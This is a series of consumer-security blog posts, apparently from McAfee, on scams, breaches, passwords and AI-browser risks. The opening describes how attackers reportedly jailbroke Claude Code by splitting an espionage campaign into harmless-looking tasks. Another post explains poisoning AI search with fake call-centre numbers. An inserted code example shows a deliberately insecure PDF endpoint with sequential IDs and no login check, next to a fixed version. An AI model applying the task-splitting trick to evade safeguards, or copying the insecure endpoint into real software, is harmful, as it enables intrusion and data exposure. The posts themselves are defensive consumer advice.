As reported by Anthropic, the AI company behind Claude, a Chinese state-sponsored group allegedly used the company’s Claude Code agent to automate most of an espionage campaign against nearly thirty organizations. The attackers allegedly bypassed the guardrails that normally prevent such misuse with jailbreaking techniques: they broke their attack down into small, seemingly innocent tasks, so that Claude orchestrated a large-scale attack it would not otherwise have executed.

Once operational, the agent performed reconnaissance, wrote exploit code, harvested credentials, identified high-value databases, created backdoors, and generated documentation of the intrusion. By Anthropic’s estimate, the AI completed 80–90% of the work without any human involvement.

    According to Anthropic: “At the peak of its attack, the AI made thousands of requests, often multiple per second—an attack speed that would have been, for human hackers, simply impossible to match.”

    We knew this moment was coming, and now the time has arrived: what once took weeks of human effort to execute a coordinated attack now boils down to minutes as agentic AI does the work on someone’s behalf.

    In 2026, we can expect to see more attacks led by agentic AI, along with AI-led scams as well, which raises an important question that Anthropic answers head-on:

    If AI models can be misused for cyberattacks at this scale, why continue to develop and release them? The answer is that the very abilities that allow Claude to be used in these attacks also make it crucial for cyber defense. When sophisticated cyberattacks inevitably occur, our goal is for Claude—into which we’ve built strong safeguards—to assist cybersecurity professionals to detect, disrupt, and prepare for future versions of the attack.

    That gets to the heart of security online: it’s an ever-evolving game. As new technologies arise, those who protect and those who harm one-up each other in a cycle of innovation and exploits. As we’re on the side of innovation here, you can be sure we’ll continue to roll out protections that keep you safer out there. Even as AI changes the game, our commitment remains the same.

    Happy Holidays!

    We’re taking a little holiday break here and we’ll be back with our weekly roundups again in 2026. Looking forward to catching up with you then and helping you stay safer in the new year.

    The post This Year in Scams: A 2025 Retrospective, and a Look Ahead at 2026 appeared first on McAfee Blog.

    How To Spot Health Insurance Scams This Open Enrollment Season

    By: McAfee

    If you’re in the market for insurance right now, keep an eye out for scammers in the mix. They’re out in full force once again this open enrollment season.

    As people across the U.S. sign up for, renew, or change their health insurance plans, scammers want to cash in as people rush to get their coverage set. And scammers have several factors working in their favor.

    For starters, many people find the insurance marketplace confusing, frustrating, and even intimidating, all feelings that scammers can take advantage of. Moreover, concerns about getting the right level of coverage at an affordable price also play into the hands of scammers.

    Amidst all this uncertainty and time pressure, health insurance scams crop up online. Whether under the guise of helping people navigate the complex landscape or by offering seemingly low-cost quotes, scammers prey on insurance seekers by stealing their personal information, Social Security numbers, and money.

    According to the FBI, health insurance scams cost families millions each year. In some cases, the costs are up front. People pay for fraudulent insurance and have their personal info stolen. And for many, the follow-on costs are far worse, where victims go in for emergency care and find that their treatment isn’t covered—leaving them with a hefty bill.

    Like so many of the scams we cover here in our blogs, you can spot health insurance scams relatively quickly once you get to know their ins and outs.

    What Kind Of Health Insurance Scams Are Out There Right Now?

    Here’s how some of those scams can play out.

    The Phishing Strategy

    Some are “one and done scams” where the scammer promises a policy or service and then disappears after stealing money and personal info—much like an online shopping scam. It’s a quick and dirty hit where scammers quickly get what they want by reaching victims the usual ways, such as through texts, emails, paid search results, and social media. In the end, victims end up on a phishing site where they think they’re locking in a good deal but handing over their info to scammers instead.

    The Long Con

    Other scams play a long con game, milking victims for thousands and thousands of dollars over time. The following complaint lodged by one victim in Washington state provides a typical example:

    A man purchased a plan to cover himself, his wife, and his two children, only to learn there was no coverage. He was sold a second policy, with the same result, and offered a refund if he purchased a third policy. When he filed a complaint, his family still had no coverage, and he was seeking a refund for more than $20,000 and reimbursement for $55,000 in treatments and prescriptions he’d paid out of pocket.

    Scams like these are known as ghost broker scams where scammers pose as insurance brokers who take insurance premiums and pocket the money, leaving victims thinking they have coverage when they don’t. In some cases, scammers initially apply for a genuine policy with a legitimate carrier, only to cancel it later, while still taking premiums from the victim as their “broker.” Many victims only find out that they got scammed when they attempt to file a claim.

    The “Fake” Cancellation Scam

Another type of scam comes in the form of policy cancellation scams. These work like any number of other account-based scams, where a scammer pretends to be a customer service rep at a bank, utility, or credit card company. In the insurance version, scammers email, text, or call with some bad news: the person’s policy is about to be cancelled. Not to worry, though, the victim can keep the policy active if they hand over some personal and financial info. It’s just one more way that scammers use urgency and fear to commit identity theft and fraud.

    What Are The Signs Of A Health Insurance Scam?

As noted, health insurance scams become relatively easy to spot once you know the tricks that scammers use. The Federal Trade Commission (FTC) offers up its list of the ones they use the most:

1) Someone says they’re from the government and needs money or your personal info. Government agencies don’t call people out of the blue to ask them for money or personal info. No one from the government will ask you to verify your Social Security, bank account, or credit card number, and they won’t ask you to wire money or pay by gift card or cryptocurrency.

If you have a question about the Health Insurance Marketplace®, contact the government directly at HealthCare.gov or 1-800-318-2596.

2) Someone tries to sell you a medical discount plan. Legitimate medical discount plans are not health insurance; at most they supplement it. They don’t pay for any of your medical expenses. Rather, they’re membership programs where you pay a recurring fee for access to a network of providers who offer their services at pre-negotiated, reduced rates. The FTC strongly advises thorough research before joining one, as some take people’s money and offer very little in return. Call your healthcare provider and ask whether they really participate in the program, and in what way. And always review the details of any medical discount plan in writing before you sign up.

    3) Someone wants your sensitive personal info in exchange for a price quote. The Affordable Care Act’s (ACA’s) official government site is HealthCare.gov. It lets you compare prices on health insurance plans, check your eligibility for healthcare subsidies, and begin enrollment. But HealthCare.gov will only ask for your monthly income and your age to give you a price quote. Never enter personal financial info like your Social Security number, bank account, or credit card number to get a quote for health insurance.

4) Someone wants money to help you navigate the Health Insurance Marketplace. The people who offer legitimate help with the Health Insurance Marketplace (sometimes called Navigators or Assisters) are not allowed to charge you and won’t ask you for personal or financial info. If they ask for money, it’s a scam. Go to HealthCare.gov and click “Find Local Help” to learn more.

    How to Avoid Health Insurance Scams

1) For health insurance, visit a trusted source like HealthCare.gov or your state marketplace. Doing so helps guarantee that you’ll get the kind of fully compliant coverage you want.

    2) Make sure the insurance covers you in your state. Not every insurer is licensed to operate in your state. Double-check that the one you’re dealing with is. A good place to start is to visit the site for your state’s insurance commission. It should have resources that let you look up the insurance companies, agents, and brokers in your state.

    3) For any insurance, research the company offering it. Run a search with the company name and add “scam” or “fraud” to it. See if any relevant news or complaints show up. And if the plan you’re being offered sounds too good to be true, it probably is.

    4) Watch out for high-pressure sales. Don’t pay anything up front and be cautious if a company is forcing you to make quick decisions.

    5) Guard your personal info. Never share your personal info, account details, or Social Security number over text or email. Make sure you’re really working with a legitimate company and that you submit any info through a secure submissions process.

6) Block bad links to phishing sites. Many insurance scams rely on phishing sites to steal personal info. A combination of our Web Protection and Scam Detector can steer you clear of them. They’ll alert you if a link might take you to one, and they’ll block those sites if you accidentally tap or click on a bad link.

    7) Monitor your identity and credit. In some health insurance scams, your personal info winds up in wrong hands, which can lead to identity fraud and theft. And the problem is that you only find out once the damage is done. Actively monitoring your identity and credit can spot a problem before it becomes an even bigger one. You can take care of both easily with our identity monitoring and credit monitoring.

Additionally, our identity theft coverage can help if the unexpected happens, with up to $2 million in identity theft coverage and identity restoration support if it’s determined that you’re a victim of identity theft.

    You’ll find these protections and more in McAfee+.

    The post How To Spot Health Insurance Scams This Open Enrollment Season appeared first on McAfee Blog.

    Why “Strong Passwords” Aren’t Enough Anymore—and What to Do Instead

    By: McAfee

    Imagine a day where you didn’t have to juggle passwords.

    No more sticky notes. No more notebooks with dozens of passwords scribbled in, crossed out, and scribbled in again. No more forgetting and resetting. No more typing them in all the time.

    And even better, imagine secure accounts, likely even more secure than you could keep them on your own.

    That’s the power of a password manager in your life.

    A password manager does the work of creating strong, unique passwords for each and every one of your accounts. And considering the hundred or so accounts you have, that’s something that would take plenty of time if you did all that work on your own.

    In all, a password manager can turn the pain of juggling passwords into a real comfort.

    What’s a bad password?

    Before we get into how a password manager can make your life easier while making your accounts more secure, let’s look at what makes up a bad password. Here are a few examples:

    Obvious passwords: Password-cracking programs start by entering a list of common (and arguably lazy) passwords. These may include the simple “password” or “1234567”. Others include common keyboard paths like “qwerty.” Even longer keyboard paths like “qwertyuiop” are well known to hackers and their tools as well. 

    Dictionary words: Hacking tools also look for common dictionary words strung together, which helps them crack longer passwords in chunks. The same goes for passwords that contain the name of the app or service in them. These are “no brainer” words found in passwords that make passwords even easier to crack.

    Repeated passwords: You may think you have such an unbreakable password that you want to use it for all your accounts. However, this means that if hackers compromise one of your accounts, all your other accounts are vulnerable. This is a favorite tactic of hackers. They’ll target less secure accounts and services and then attempt to re-use those credentials on more secure services like online bank and credit card companies. 

    Personal information passwords: Passwords that include your birthday, dog’s name, or nickname leave you open to attack. While they’re easy for you to remember, they’re also easy for a hacker to discover—such as with a quick trip to your social media profile, particularly if it is not set to private.

    If any of the above sounds familiar, you’ll want to replace any of your bad passwords with strong ones.

    What’s a good password?

    We can point to three things that make up a strong password, which makes it difficult to hack.

    Your password is:

    Long: A longer password is potentially a stronger password when it comes to a “brute force” attack, where a hacker uses an automated trial-and-error system to break it. For example, an eight-character password using uppercase and lowercase letters, numbers, and symbols can get hacked in minutes. Kick it up to 16 characters and it becomes far more difficult to break—provided it doesn’t rely on common words or phrases. McAfee’s random password generator can help you create one.

    Complex: To increase the security of your password, it should combine uppercase letters, lowercase letters, symbols, and numbers, as mentioned above.

    Unique: Every one of your accounts should have its own password.

    Now, apply this to the hundred or so accounts you keep, and creating strong passwords for all of them really does call for a lot of work.
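    As an added example (not code from the McAfee post), here is a small Python audit that applies the criteria from the “What’s a bad password?” and “What’s a good password?” sections to a set of account passwords: common and keyboard-path passwords, dictionary and service-name words, personal details, length under 16, missing character classes, and reuse across accounts. The word lists and the sample vault are constructed placeholders, not real breach data.

```python
import string
from collections import Counter

# Constructed sample word lists for this example. A real audit would use a large
# breached-password list and a full dictionary instead of these few entries.
COMMON_PASSWORDS = {"password", "1234567", "12345678", "qwerty", "qwertyuiop", "letmein"}
KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890"]
DICTIONARY_WORDS = {"sunshine", "dragon", "welcome", "monkey", "summer", "bank", "mail"}
MIN_LENGTH = 16  # the article's recommended minimum length


def has_keyboard_walk(pw, min_len=4):
    """True if pw contains min_len or more adjacent keys from one keyboard row,
    in either direction (catches "qwerty", "poiuy", "1234", ...)."""
    low = pw.lower()
    for row in KEYBOARD_ROWS:
        for seq in (row, row[::-1]):
            for i in range(len(seq) - min_len + 1):
                if seq[i:i + min_len] in low:
                    return True
    return False


def contains_dictionary_word(pw, words, min_len=4):
    """True if any dictionary word of min_len+ letters appears inside pw."""
    low = pw.lower()
    return any(w in low for w in words if len(w) >= min_len)


def char_classes(pw):
    """Number of character classes present: lower, upper, digit, symbol (0..4)."""
    return (any(c.islower() for c in pw) + any(c.isupper() for c in pw)
            + any(c.isdigit() for c in pw) + any(c in string.punctuation for c in pw))


def audit_password(pw, service="", personal_tokens=(), dictionary=DICTIONARY_WORDS):
    """Return a list of findings for one password; an empty list means it passes."""
    findings = []
    low = pw.lower()
    if low in COMMON_PASSWORDS:
        findings.append("obvious: appears on a common-password list")
    if has_keyboard_walk(pw):
        findings.append("obvious: contains a keyboard path")
    if contains_dictionary_word(pw, dictionary):
        findings.append("dictionary: contains a common word")
    if service and service.lower() in low:
        findings.append("dictionary: contains the service name")
    for tok in personal_tokens:
        if len(tok) >= 3 and tok.lower() in low:
            findings.append(f"personal: contains '{tok}'")
    if len(pw) < MIN_LENGTH:
        findings.append(f"short: {len(pw)} chars, fewer than {MIN_LENGTH}")
    if char_classes(pw) < 4:
        findings.append("simple: missing one or more character classes")
    return findings


def audit_vault(vault, personal_tokens=()):
    """Audit every account in vault (account name -> password) and also flag
    any password that is reused on more than one account."""
    counts = Counter(vault.values())
    report = {}
    for service, pw in vault.items():
        findings = audit_password(pw, service, personal_tokens)
        if counts[pw] > 1:
            others = sorted(s for s, p in vault.items() if p == pw and s != service)
            findings.append("reused: same password on " + ", ".join(others))
        report[service] = findings
    return report


# Constructed sample vault: "Rex" and "2014" stand in for a pet's name and a
# birth year that could be read off a public social media profile.
SAMPLE_VAULT = {
    "bank": "Rex2014!",
    "shop": "qwertyuiop",
    "forum": "Rex2014!",
    "mail": "V7#kq!Lm2$Zp9@Rw",
}
SAMPLE_PERSONAL = ("Rex", "2014")

if __name__ == "__main__":
    for account, findings in audit_vault(SAMPLE_VAULT, SAMPLE_PERSONAL).items():
        print(account, "OK" if not findings else "; ".join(findings))
```

    Only the 16-character random password passes; the reused "Rex2014!" is flagged on both accounts it protects, which is exactly the one-breach-unlocks-everything risk the article describes.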

    Should I use a password manager?

    Given its ease of use and the big security boost it gives you and all your accounts, the answer is yes.

    A password manager does the work of creating strong, unique passwords for your accounts. These will take the form of a string of random numbers, letters, and characters. They won’t be memorable, but the manager does the memorizing for you. You only need to remember a single password to access the tools of your manager.

    A strong password manager also stores your passwords securely. Our password manager protects your passwords by scrambling them with AES-256, one of the strongest encryption algorithms available. Only you can decrypt and access your info with the factors you choose. Additionally, our password manager uses multi-factor authentication (MFA), so you’ll be verified by at least two factors before being signed in.

    Aside from the comfort of convenience a password manager can give you, it gives you another level of assurance—extra protection in an age of data breaches, because you’ll have unique passwords where one compromise won’t lead to others.

    And whether or not you go with a password manager to create those strong and unique passwords, make sure you use MFA on every account that offers it. MFA adds another factor to the login process, such as something you have, like a code texted to your phone or a prompt in an authenticator app. That way, even if a hacker has your password, they’ll still be locked out of your account because they lack that MFA code.

    One more smart move: delete your old accounts

    In some cases, you really don’t need some of your old accounts and the passwords that come along with them. Maybe they’re old and unused. Or maybe they were for a one-time purchase at an online store you won’t visit again. Deleting these accounts is a smart move because they’re yet more places where your personal info is stored—and subject to a data breach.

    Our Online Account Cleanup can help, which you can find in all our McAfee+ plans. It scans for accounts in your name, gives you a full list, and shows you which types of accounts might be riskier than others. From there you can decide which ones you want to delete, along with the personal info linked to them. In our McAfee+ Ultimate plans, you get full-service Online Account Cleanup, which sends the data deletion requests for you.

    Between this and a password manager, you’ll have one less thing to juggle—your passwords, and one less thing to worry about—if they’re secure from hackers.

    The post Why “Strong Passwords” Aren’t Enough Anymore—and What to Do Instead appeared first on McAfee Blog.

    This Week in Scams: Petco Breach Warning, and Watch Out for Fake Federal Calls

    By: McAfee

    Pets, poisoned AI search results, and a phone call that sounds like it’s coming straight from the federal government: this week’s scams don’t have much in common except one thing. They’re getting harder to spot.

    In today’s edition of This Week in Scams, we’re breaking down the biggest security lapses and the tactics scammers used to exploit them, and what you can do to stay ahead of the latest threats.

    Two data security lapses discovered at Petco in one week put pet parents at risk

    If you’re a Petco customer, you’ll want to know about not one but two data security lapses in the past week.

    First, as reported by TechCrunch on Monday, Petco followed Texas data privacy laws by filing a data breach notice with the attorney general’s office. In that filing, Petco reported that the affected data included names, Social Security numbers, and driver’s license numbers. Further info, including account numbers, credit and debit card numbers, and dates of birth, was also mentioned in the filing.

    Also according to TechCrunch, the company filed similar notices in California and Massachusetts.

    To date, Petco has not made a comment about the size of the breach and the number of people affected.

    Different states have different policies for reporting data breaches. In some cases, that helps us put a figure to the size of the breach, as some states require companies to disclose the total number of people caught up in the breach. That’s not the case here, so the full scope of the attack remains in question, at least for right now.

    As of Thursday, we know Petco reported that 329 Texans were affected along with seven Massachusetts residents, per the respective reports filed. California’s report does not contain the number of Californians affected, yet laws in that state require businesses to report breaches that affect 500 or more people, so at least 500 people were affected there.

    Below you can see the form letter Petco sent to affected Californians in accordance with California’s data privacy laws:

    Copy of the form letter posted on the California Attorney General’s Website

    In it, you can see that Petco discovered that “a setting within one of our software applications … inadvertently allowed certain files to become accessible online.” Further, Petco said that it “immediately took steps to correct the issue and to remove the files from further online access,” and that it “corrected” the setting and implemented unspecified “additional security measures.”

    So while no foul play appears to have been behind the breach, it’s still no less risky and concerning for Petco’s customers. We’ll cover what you can do about that in a moment after we cover yet another data issue at Petco through its Vetco clinics.

    Also within the same timeframe, yet more research and reporting from TechCrunch uncovered a second security lapse that exposed personal info online. From their article:

    “TechCrunch identified a vulnerability in how Vetco’s website generates copies of PDF documents for its customers.

    “Vetco’s customer portal, located at petpass.com, allows customers to log in and obtain veterinary records and other documents relating to their pet’s care. But TechCrunch found that the PDF generating page on Vetco’s website was public and not protected with a password.

    “As such, it was possible for anyone on the internet to access sensitive customer files directly from Vetco’s servers by modifying the web address to input a customer’s unique identification number. Vetco customer numbers are sequential, which means one could access other customers’ data simply by changing a customer number by one or two digits.”
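    As an added illustration (not code from the McAfee post, from TechCrunch, or from Vetco), the two design flaws the quote describes, a PDF endpoint that needs no login and customer numbers that are sequential, next to a hardened version that requires a server-side session, checks that the record belongs to that user, and keys records by unguessable random identifiers. All names and record contents are constructed.

```python
import secrets

# Constructed sample data for this example. In the vulnerable design a record
# is looked up directly by a small, sequential customer number from the URL.
RECORDS_BY_SEQ = {
    1001: {"owner": "alice", "pdf": b"%PDF constructed vaccination record for alice"},
    1002: {"owner": "bob", "pdf": b"%PDF constructed bloodwork record for bob"},
}


def vulnerable_pdf_endpoint(customer_number):
    """The pattern the quote describes: no login required, no ownership check,
    and a guessable sequential identifier taken straight from the request."""
    rec = RECORDS_BY_SEQ.get(customer_number)
    return rec["pdf"] if rec else None


# Hardened design: records are keyed by a random token that cannot be counted
# up or down, and the endpoint checks both login state and ownership.
RECORDS_BY_TOKEN = {}


def store_record(owner, pdf):
    """Create a record under a 128-bit random, URL-safe identifier."""
    record_id = secrets.token_urlsafe(16)
    RECORDS_BY_TOKEN[record_id] = {"owner": owner, "pdf": pdf}
    return record_id


def hardened_pdf_endpoint(session_user, record_id):
    """Return (http_status, body). session_user is the account established by
    the server-side session, never a value read from the URL."""
    if session_user is None:
        return 401, None  # not logged in: never serve documents anonymously
    rec = RECORDS_BY_TOKEN.get(record_id)
    # Answer 404 for both "no such record" and "not your record" so the
    # response does not confirm that another customer's document exists.
    if rec is None or rec["owner"] != session_user:
        return 404, None
    return 200, rec["pdf"]


if __name__ == "__main__":
    # The vulnerable version hands out any record to any caller, logged in or not.
    print(vulnerable_pdf_endpoint(1002))
    # The hardened version only serves a record to its authenticated owner.
    rid = store_record("alice", b"%PDF constructed record")
    print(hardened_pdf_endpoint("alice", rid), hardened_pdf_endpoint("bob", rid))
```

    Random identifiers alone are not the fix; the ownership check is what stops a logged-in customer from reading someone else’s file, and the random IDs just remove the easy enumeration.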

    What to do if you think you had info stolen in the Petco breach

    With the size and reach of the Petco breach still unknown, and the impact of the Vetco security lapse also unknown, we advise caution for all Petco customers. At minimum, monitor transactions and keep an eye on your credit report for any suspicious activity. And it’s always a good time to update a weak password.

    For those who received a notification, we advise the following:

    Check your credit, consider a security freeze, and get ID theft protection. You can get all three working for you with McAfee+ Advanced or McAfee+ Ultimate.

    Monitor transactions across your accounts, also available in McAfee+ Advanced and Ultimate.

    Keep an eye out for phishing attacks. Use our Scam Detector to spot any follow-on attacks.

    Update your passwords. Strong and unique passwords are best. Our password manager can help you create and store them securely.

    And use two-factor authentication on all your accounts. Enabling two-factor authentication provides an added layer of security.

    Image Credit: Federal Register

    What to do if your Social Security number was breached.

    If you think your Social Security number was caught up in the breach, act quickly.

    1. Contact one of the three credit bureaus (Equifax, Experian, or TransUnion) and place a fraud alert on your credit report. That will cover all three bureaus and make it harder for someone to open new accounts in your name. You can also quickly freeze your credit altogether with McAfee+ Ultimate.
    2. Also notify the Social Security Administration (SSA) along with the Internal Revenue Service (IRS), and file a police report immediately if you believe your number is being misused.

    The call center number that connects you to … scammers?

    You might want to be careful when searching for customer service numbers while in AI mode. Or with an AI search engine. It could connect you to a scammer.

    From The Times come reports of scammers manipulating the AI in platforms like Google and Perplexity so that their search results return scam numbers instead of the proper customer service number for, say, British Airways.

    How do they manipulate those results? By spamming the internet with false info that gets picked up and then amplified by AI.

    “[S]cammers have started seeding fake call center numbers on the web so the AI is tricked into thinking it is genuine …

    “Criminals have set up YouTube channels with videos claiming to help with customer support, which are packed with airline brand names and scam numbers designed to be scraped and reused by the AI.

    “Bot-generated reviews on Yelp or video descriptions on YouTube are filled with fraudulent numbers as are airline and travel web forums.”

    And with these tactics, scammers could poison the results for just about any organization, business, or brand. Not just airlines. Per The Times, “The scammers have also hijacked government sites, university domains, and even fitness sites to place scam numbers, which fools the AI into thinking they are genuine.”

    This reveals a current limitation with many AI platforms. Largely they can’t distinguish when people deliberately feed them bad info, as seen in the case here.

    Yet even as this attack is new, our advice remains the same: any time you want to ring up a customer service line, get the number directly from the company’s official website. Not from AI search and not by clicking a paid search result that shows up first (scammers can poison them too).

    Is that a call from an FTC “agent?” If so, it’s a scam.

    Are you under investigation for money laundering? Of course not. But this scam wants you to think so—and to pay up.

    On Tuesday, the Federal Trade Commission (FTC) issued a consumer alert warning that people are reporting getting unexpected calls from someone saying they’re “FTC agent” John Krebs. Apparently “Agent Krebs” is telling people that they’re under investigation for money laundering—and that a deposit to a Bitcoin ATM can resolve the matter.

    Of course, it’s a scam.

    For starters, the FTC doesn’t have “agents.” And the idea of clearing one’s name in an investigation with a Bitcoin payment is a sure-fire sign of a scam. Lastly, any time someone asks for payment with Bitcoin or other payment methods that are near-impossible to recover (think wire transfers and gift cards), those are big red flags.

    Apart from hanging up and holding on to your money, the FTC offers the following guidance, which holds true for any scam call:

    • Never transfer or send money to anyone in response to an unexpected call or message, no matter who they say they are.
    • Know that the FTC won’t ask for money. In fact, no government agency will ever tell you to deposit money at a cryptocurrency ATM, buy gift cards and share the numbers, or send money over a payment app like Zelle, Cash App, or Venmo.
    • Don’t trust your caller ID. A call might look like it’s coming from the government or a business, but scammers often fake caller ID.

    And we close things out with a quick roundup …

    As always, here’s a quick list of a few stories that caught our eye this week:

    AI tools transform Christmas shopping as people turn to chatbots

    National cybercrime network operating for 14 years dismantled in Indonesia

    Why is AI becoming the go-to support for our children’s mental health?

    We’ll see you next Friday with a special edition to close out 2025 … This Year in Scams.

    The post This Week in Scams: Petco Breach Warning, and Watch Out for Fake Federal Calls appeared first on McAfee Blog.

    How to Stay Safe on Your New AI Browser

    By: McAfee

    AI-powered browsers give you much more than a window to the web. They represent an entirely new way to experience the internet, with an AI “agent” working by your side.

    We’re entering an age where you can delegate all kinds of tasks to a browser, and with that comes a few things you’ll want to keep in mind when using AI browsers like ChatGPT’s Atlas, Perplexity’s Comet, and others.

    What are agentic AI browsers?

    So, what’s the allure of this new breed of browser? The answer is that they’re highly helpful, and plenty more besides.

    By design, these “agentic” AI browsers actively assist you with the things you do online. They can automate tasks and interpret your intentions when you make a request. Further, they can work proactively by anticipating things you might need or by offering suggestions.

    In a way, an AI browser works like a personal assistant. It can summarize the pages in several open tabs, conduct research on just about any topic you ask it to, or even track down the lowest airfare to Paris in the month of May. Want it to order ink for your printer and some batteries for your remote? It can do that too. And that’s just to name a few possibilities.

    As you can see, referring to the AI in these browsers as “agentic” fits. It truly works like an agent on your behalf, a capability that promises to get more powerful over time.

    Is it safe to use an AI browser?

    But as with any new technology, early adopters should balance excitement with awareness, especially when it comes to privacy and security. You might have seen some recent headlines that shared word of security concerns with these browsers.

    The reported exploits vary, as does the harm they can potentially inflict. That ranges from stealing personal info and gaining access to Gmail and Google Drive files, to installing malware and injecting the AI’s “memory” with malicious instructions, which can follow from session to session and device to device, wherever a user logs in.

    Our own research has shown that some of these attacks are now tougher to pull off than they were initially, particularly as the AI browser companies continue to put guardrails in place. If anything, this reinforces a long-standing truth about online security: it’s a cat-and-mouse game. Tech companies put protections in place, bad actors discover an exploit, companies put further protections in place, new exploits crop up, and so on. It’s much the same in the rapidly evolving space of AI browsers. The technology might be new, but the game certainly isn’t.

    While these reports don’t mean AI browsers are necessarily unsafe to use, they do underscore how fast this space is evolving…and why caution is smart as the tech matures.

    How To Use an AI Browser Safely

    It’s still early days for AI-powered browsers and for understanding the security and privacy implications of their use. With that, we strongly recommend the following to help reduce your risk:

    Don’t let an AI browser do what you wouldn’t let a stranger do. Handle things like your banking, finances, and health on your own. And the same certainly goes for all the info tied to those aspects of your life.

    Pay attention to confirmations. As of today, agentic browsers still require some level of confirmation from the user to perform key actions (like processing a payment, sending an email, or updating a calendar entry). Pay close attention to them, so you can prevent your browser from doing something you don’t want it to do.

    Use the “logged out” mode, if possible. As of this writing, at least one AI browser, Atlas, gives you the option to use the agent in logged-out mode. This limits its access to sensitive data and the risk of it taking actions on your behalf with your credentials.

    If possible, disable “model learning.” By turning it off, you reduce the amount of personal info stored and processed by the AI provider for AI training purposes, which can minimize security and privacy risks.

    Set privacy controls to the strictest options available. Further, understand what privacy policies the AI developer has in place. For example, some AI providers have policies that allow people to review your interactions with the AI as part of its training. These policies vary from company to company, and they tend to undergo changes. Keeping regular tabs on the privacy policy of the AI browser you use makes for a privacy-smart move.

    Keep yourself informed. The capabilities, features, and privacy policies of AI-powered browsers continue to evolve rapidly. Set up news alerts about the AI browser you use and see if any issues get reported and, if so, how the AI developer has responded. Do routine searches pairing the name of the AI browser with “privacy.”

    How McAfee Can Help

    McAfee’s award-winning protection helps you browse safer, whether you’re testing out new AI tools or just surfing the web.

    McAfee offers comprehensive privacy services, including personal info scans and removal plus a secure VPN.

    Plus, protections like McAfee’s Scam Detector automatically alert you to suspicious texts, emails, and videos before harm can happen—helping you manage your online presence confidently and safeguard your digital life for the long term. Likewise, Web Protection can help steer you clear of suspicious websites that might take advantage of AI browsers.

    The post How to Stay Safe on Your New AI Browser appeared first on McAfee Blog.

    What Is Internet Security?

    By: McAfee

    Internet security refers to the tactics that protect your online activities from various cyber threats, including malware, phishing attacks, scams, and unauthorized access by hackers. In this article, we will highlight the importance of internet security in safeguarding your digital network and outline the steps you can take to establish a comprehensive online security system.

    Why internet security matters

    Internet usage has become central to our daily lives. In 2024 alone, DataReportal reported that around 5.56 billion people, or 67.9% of the world’s population, were connected to the internet. This was 136 million more than the year before, resulting in the creation of approximately 402.7 million terabytes of data each day. With this wealth of information, it is no wonder that cybercriminals are scrambling to make billions of dollars off the internet.

    Globally, the average cost of data breaches rose by 10% between 2023 and 2024, totaling an estimated $4.88 million. This staggering amount included not only the loss in business revenues but also recovery costs and regulatory fines. For this reason, it has become important to implement internet security to protect our online personal data, activities, and devices from cyber threats and unauthorized access.

    While internet security is sometimes confused with cybersecurity, it’s important to point out their subtle distinctions. Internet security focuses on protecting your activities and data as they travel across the web. In contrast, cybersecurity focuses on protecting digital assets, including systems, networks, and data, from cyber threats. These two concepts work together to create your complete digital protection environment.

    The importance of internet security

    Internet security threats vary in form, complexity, and how easily they can be detected. Some of the common threats we face today include:

    • Malware: Malicious software is an umbrella term that refers to any program that exploits system vulnerabilities to damage a computer system or network and steal sensitive information from users. Examples of malware include viruses, Trojans, ransomware, spyware, and worms.
    • Phishing: Phishing is a social engineering scam that involves stealing a user’s sensitive data by deceiving them into opening an email or an instant message and clicking a malicious link or attachment. The data that cybercriminals target can range from login credentials to credit card numbers and other sensitive information. You may unknowingly provide access codes to fake tech support or transfer money to scammers posing as family members in emergency situations. Phishing attacks are often used for identity theft purposes.
    • Spam: Spam refers to unwanted email messages sent in bulk to your email inbox. This tactic is generally used to promote goods and services that users aren’t interested in. Spam emails can also contain links to malicious websites that automatically install harmful programs that help hackers gain access to your data.
    • Botnets: This contraction of “robot network” refers to a network of computers that have been infected with malware. The computers are then prompted to perform automated tasks without permission, such as sending spam and carrying out distributed denial-of-service (DDoS) attacks.
    • Wi-Fi threats: Hackers exploit unprotected public Wi-Fi connections to breach data security and obtain sensitive information, including login credentials, emails, and browsing activity. Your personal information could be stolen when you check your email, shop online, or access your bank accounts on public networks.
    • Ransomware: This malicious software locks your files and demands payment for their release. You could lose precious family photos, important documents, or access to your devices until you pay, with no guarantee you’ll get your files back. The FBI reported nearly $12.5 billion in ransomware losses in 2024.
    • Credential stuffing: Cybercriminals use automated tools to test stolen username and password combinations across multiple sites, hoping you’ve reused the same login credentials. This can give hackers access to your online banking, shopping accounts, and social media profiles.
    • Account takeovers: When criminals gain control of your online accounts through stolen passwords or security vulnerabilities, they can lock you out while using your accounts for fraudulent activities such as draining your bank account, making unauthorized purchases, or damaging your reputation on social media. In the U.S. alone, approximately 77 million Americans fell victim to account takeover fraud in 2024.
    • Browser hijacking: This occurs when unwanted software changes your browser settings, redirecting you to malicious websites, flooding you with unwanted ads and pop-ups, then stealing your information or installing more malware on your device. A recent investigation revealed that at least 16 malicious extensions in Chrome alone have affected over 3.2 million users.

    While internet security threats may seem overwhelming at first glance, solutions are available to safeguard your computer or mobile devices. Below is a detailed look at some security measures.

    Network security basics

    Your home network serves as the foundation of your digital life, connecting all your devices and enabling your online activities. Having a strong network security foundation with multiple layers of protection will keep your connections and data safe from cyber threats.

    Secure the router

    Your router serves as the gateway between your home devices and the internet, making it a critical security component. Start by changing your router’s default administrator username and password immediately after setup. These factory defaults are widely known and easily exploited by attackers. Choose a strong, unique password that combines letters, numbers, and symbols to prevent unauthorized access to your router’s settings.

    Encrypt your Wi-Fi

    Enable WPA3 encryption on your wireless network, as it provides the strongest protection for your Wi-Fi connections. If your router doesn’t support WPA3, use WPA2 as a minimum standard. These protocols scramble your data as it travels between devices and your router, making it unreadable to anyone attempting to intercept your communications.

    Fortify network names and passwords

    Create a unique network name or service set identifier (SSID) that doesn’t reveal your router manufacturer or model number, and pair it with a complex Wi-Fi password at least 12 characters long with a mix of uppercase and lowercase letters, numbers, and special characters. Avoid using personal information such as your address or name in either your network name or password, as this information can help attackers guess your password.

    Update firmware

    Regularly update your router’s firmware to patch security vulnerabilities and improve performance. Check your router manufacturer’s website quarterly for updates if automatic updates aren’t available, as outdated firmware often contains known security flaws that cybercriminals actively exploit.

    Set up guest networks

    Set up a separate guest network for visitors and smart home devices to protect your primary network, where you store sensitive data. If a guest’s device is compromised or if a smart device has security vulnerabilities, the threat can’t easily spread to your main computers and phones. Configure your guest network with a strong password and consider time limits for access.

    Isolate devices and segment the network

    Enable access point isolation, also called client isolation, on your wireless network to prevent potentially compromised devices from attacking other devices on the same network. If you are an advanced user, consider creating separate virtual networks (VLANs) for different device types, such as keeping work computers on a different network segment than entertainment devices.

    Activate the firewall

